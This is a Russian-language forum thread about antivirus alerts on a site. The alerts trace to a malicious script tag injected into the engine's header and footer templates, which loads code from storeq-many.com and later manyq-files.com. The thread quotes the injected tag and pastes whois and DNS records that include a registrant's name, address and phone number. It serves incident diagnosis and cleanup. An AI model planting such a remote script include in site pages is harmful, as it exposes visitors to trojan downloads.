При открытии любой страницы форума Касперский ругается на содержание фишинговой ссылки.
Вот она в исходнике html:

<script type="text/javascript" src="http://storeq-many.com/r.php?go=http%3A//storeq-many.com/opera%3Fwkey%3D6393"></script>

Доктор-Веб аналогично.

При открытии любой страницы форума Касперский ругается на содержание фишинговой ссылки.
Вот она в исходнике html:

<script type="text/javascript" src="http://storeq-many.com/r.php?go=http%3A//storeq-many.com/opera%3Fwkey%3D6393"></script>
а поподробнее можно что там антивирусы сообщают? приведенный фрагмент исходника коротковат, по нему не найти, т.к., разумеется, в исходниках движка таких ссылок нет, зловредные ссылки формируются динамически (и не факт, что движком сайта)
это похоже на троян - предложение подменить браузер opera mini, скорей всего для андроида http://freebrowsers.ru/news/769/ , для обычной винды не действует

Сервис проверки сайтов кучей антивирусов ничего не обнаруживает http://www.virustotal.com/file-scan/report.html?id=999834904f3dc7b3d3b0f91be7f14259af51e2f2a25c50fe0dee4c09a6c46c80-1326114561

Вот аналогичная ситуация на другом сайтовом движке http://www.aveoclub.ru/forum/index.php?showtopic=38729
В рекламе закопан код? так и рекламный дилер другой - там яндекс, здесь гугль.

Norton тоже ругается

ScrInject.B.Gen вирус

"для протокола":

Domain Name: STOREQ-MANY.COM

Registrant:
Private Person
Oleg Stepanov (stimulprofit.supp*gmail.com)
ul, Kluchevaya 19 - 5
Sankt Peterburg
SPB,195221
RU
Tel. +7.9168041849

Creation Date: 02-Jan-2012
Expiration Date: 02-Jan-2013

Domain servers in listed order:
ns1.reg.ru
ns2.reg.ru

Administrative Contact:
Private Person
Oleg Stepanov (stimulprofit.supp*gmail.com)
ul, Kluchevaya 19 - 5
Sankt Peterburg
SPB,195221
RU
Tel. +7.9168041849

Technical Contact:
Private Person
Oleg Stepanov (stimulprofit.supp*gmail.com)
ul, Kluchevaya 19 - 5
Sankt Peterburg
SPB,195221
RU
Tel. +7.9168041849

Billing Contact:
Private Person
Oleg Stepanov (stimulprofit.supp*gmail.com)
ul, Kluchevaya 19 - 5
Sankt Peterburg
SPB,195221
RU
Tel. +7.9168041849

************01/09/12 20:10:04 whois manyc-mob.com
.com is a domain of USA & International Commercial
Searches for .com can be run at http://www.crsnic.net/

whois -h whois.crsnic.net manyc-mob.com ...
Redirecting to DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM

whois -h whois.PublicDomainRegistry.com manyc-mob.com ...
Registration Service Provided By: DOMAIN NAMES REGISTRAR REG.RU LTD.
Contact: +7.4955801111

Domain Name: MANYC-MOB.COM

Registrant:
Private Person
Oleg Stepanov (stimulprofit.supp*gmail.com)
ul, Kluchevaya 19 - 5
Sankt Peterburg
SPB,195221
RU
Tel. +7.9168041849

Creation Date: 03-Jan-2012
Expiration Date: 03-Jan-2013

Domain servers in listed order:
ns1.reg.ru
ns2.reg.ru


Administrative Contact:
Private Person
Oleg Stepanov (stimulprofit.supp*gmail.com)
ul, Kluchevaya 19 - 5
Sankt Peterburg
SPB,195221
RU
Tel. +7.9168041849

Technical Contact:
Private Person
Oleg Stepanov (stimulprofit.supp*gmail.com)
ul, Kluchevaya 19 - 5
Sankt Peterburg
SPB,195221
RU
Tel. +7.9168041849

Billing Contact:
Private Person
Oleg Stepanov (stimulprofit.supp*gmail.com)
ul, Kluchevaya 19 - 5
Sankt Peterburg
SPB,195221
RU
Tel. +7.9168041849


**************
01/09/12 20:10:38 whois manyq-files.com
.com is a domain of USA & International Commercial
Searches for .com can be run at http://www.crsnic.net/

whois -h whois.crsnic.net manyq-files.com ...
Redirecting to DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM

whois -h whois.PublicDomainRegistry.com manyq-files.com ...
Registration Service Provided By: DOMAIN NAMES REGISTRAR REG.RU LTD.
Contact: +7.4955801111

Domain Name: MANYQ-FILES.COM

Registrant:
Private Person
Oleg Stepanov (stimulprofit.supp*gmail.com)
ul, Kluchevaya 19 - 5
Sankt Peterburg
SPB,195221
RU
Tel. +7.9168041849

Creation Date: 04-Jan-2012
Expiration Date: 04-Jan-2013

Domain servers in listed order:
ns1.reg.ru
ns2.reg.ru


Administrative Contact:
Private Person
Oleg Stepanov (stimulprofit.supp*gmail.com)
ul, Kluchevaya 19 - 5
Sankt Peterburg
SPB,195221
RU
Tel. +7.9168041849

Technical Contact:
Private Person
Oleg Stepanov (stimulprofit.supp*gmail.com)
ul, Kluchevaya 19 - 5
Sankt Peterburg
SPB,195221
RU
Tel. +7.9168041849

Billing Contact:
Private Person
Oleg Stepanov (stimulprofit.supp*gmail.com)
ul, Kluchevaya 19 - 5
Sankt Peterburg
SPB,195221
RU
Tel. +7.9168041849

01/09/12 17:55:25 dig storeq-many.com * 8.8.8.8
Dig storeq-many.com*8.8.8.8 ...
Non-authoritative answer
Recursive queries supported by this server
Query for storeq-many.com type=255 class=1
storeq-many.com NS (Nameserver) ns2.reg.ru
storeq-many.com SOA (Zone of Authority)
Primary NS: ns1.reg.ru
Responsible person: hostmaster*ns1.reg.ru
serial:1325534456
refresh:14400s (4 hours)
retry:3600s (60 minutes)
expire:604800s (7 days)
minimum-ttl:21600s (6 hours)
storeq-many.com A (Address) 91.202.63.179
storeq-many.com NS (Nameserver) ns1.reg.ru

01/09/12 20:16:39 dig manyq-files.com * 8.8.8.8
Dig manyq-files.com*8.8.8.8 ...
Non-authoritative answer
Recursive queries supported by this server
Query for manyq-files.com type=255 class=1
manyq-files.com NS (Nameserver) ns1.reg.ru
manyq-files.com SOA (Zone of Authority)
Primary NS: ns1.reg.ru
Responsible person: hostmaster*ns1.reg.ru
serial:1325673033
refresh:14400s (4 hours)
retry:3600s (60 minutes)
expire:604800s (7 days)
minimum-ttl:21600s (6 hours)
manyq-files.com NS (Nameserver) ns2.reg.ru
manyq-files.com A (Address) 91.202.63.179

01/09/12 20:17:05 dig manyc-mob.com * 8.8.8.8
Dig manyc-mob.com*8.8.8.8 ...
Non-authoritative answer
Recursive queries supported by this server
Query for manyc-mob.com type=255 class=1
manyc-mob.com SOA (Zone of Authority)
Primary NS: ns1.reg.ru
Responsible person: hostmaster*ns1.reg.ru
serial:1325615431
refresh:14400s (4 hours)
retry:3600s (60 minutes)
expire:604800s (7 days)
minimum-ttl:21600s (6 hours)
manyc-mob.com NS (Nameserver) ns2.reg.ru
manyc-mob.com NS (Nameserver) ns1.reg.ru
manyc-mob.com A (Address) 91.202.63.179

Линк в виде пряморукой строки обнаружил в шаблонах header и footer сайтового движка. Убрал. Что примечательно - этих двух строк не было перед апгрейдом версии движка с 412sp4 до 419 и последующей русификации, проведенных 4 янв 2012. а нет, и сразу после работ их не было. Их нет и на тестово-учебной версии движка (на другом хостинге).

//manyq-files.com/r.php?go=http%3A//manyq-files.com/opera%3Fwkey%3D6393
Теперь на этот ругается. Если не заходить, то не страшно.

о, реинкарнация

Теперь перестал.